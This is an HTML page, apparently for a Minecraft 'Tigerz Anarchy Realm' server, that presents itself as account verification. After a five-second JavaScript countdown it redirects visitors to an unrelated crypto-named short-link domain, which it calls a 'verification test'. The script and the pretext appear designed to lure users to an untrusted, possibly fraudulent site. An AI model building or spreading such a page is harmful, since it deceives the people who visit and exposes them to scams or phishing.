<!DOCTYPE html>

<html>
<head>
    <title>Tigerz Anarchy Account Verification</title>
    <meta charset="utf-8">
</head>
<div align="center"><body style="background-image:url(../assets/backgrounds/backgroundaccount.png); margin-left: 30%; margin-right: 30%; margin-top: 15%; font-family: Arial, Helvetica, sans-serif;">
<style>
        
        a:link {
          color: white;
          background-color: transparent;
          text-decoration: none;
        }
        
        a:visited {
          color: white;
          background-color: transparent;
          text-decoration: none;
        }
        
        a:hover {
          color: #BA55D3;
          background-color: transparent;
          text-decoration: underline;
        }
        
        a:active {
          color: white;
          background-color: transparent;
          text-decoration: underline;
        }
</style>
<div style=" border: 5px; border-color: #BA55D3; border-style: solid; border-radius: 32px; background-color: #5539cc; color: white;">
    <h1 style="font-size: 50px; text-shadow: 2px 2px #BA55D3;"><b>Tigerz Anarchy Realm</b></h1>
    <h1 style="font-size: 50px; text-shadow: 2px 2px #BA55D3; position:relative; bottom:50px;"><b>Account Verification</b></h1>
    <a style="margin: 33px; font-size: 19px; position:relative; bottom:50px;"href="https://discord.com/invite/mojave-mc">Discord</a>
    <hr size="10" style="border-radius: 30px; margin-left: 50px; margin-right: 50px; background-color: #BA55D3; border-color: #BA55D3; position:relative; bottom:50px;">
    <h1 style=" padding-top: 10%; padding-bottom: 10%; " >You Will Be Redirected to the Account Verification Test In</h1>
    <div style="font-size: 75px; position:relative; bottom:75px;"id="counter">5</div>
    <h1 style=" padding-top: 10%; padding-bottom: 10%; position:relative; bottom:175px;" >Seconds</h1>
    <script>
        setInterval(function() {
            var div = document.querySelector("#counter");
            var count = div.textContent * 1 - 1;
            div.textContent = count;
            if (count <= 0) {
                window.location.replace("https://crypto-o.click/G3KFTH");
            }
        }, 1000);
    </script>
</div>
</body>
</div>
</html>
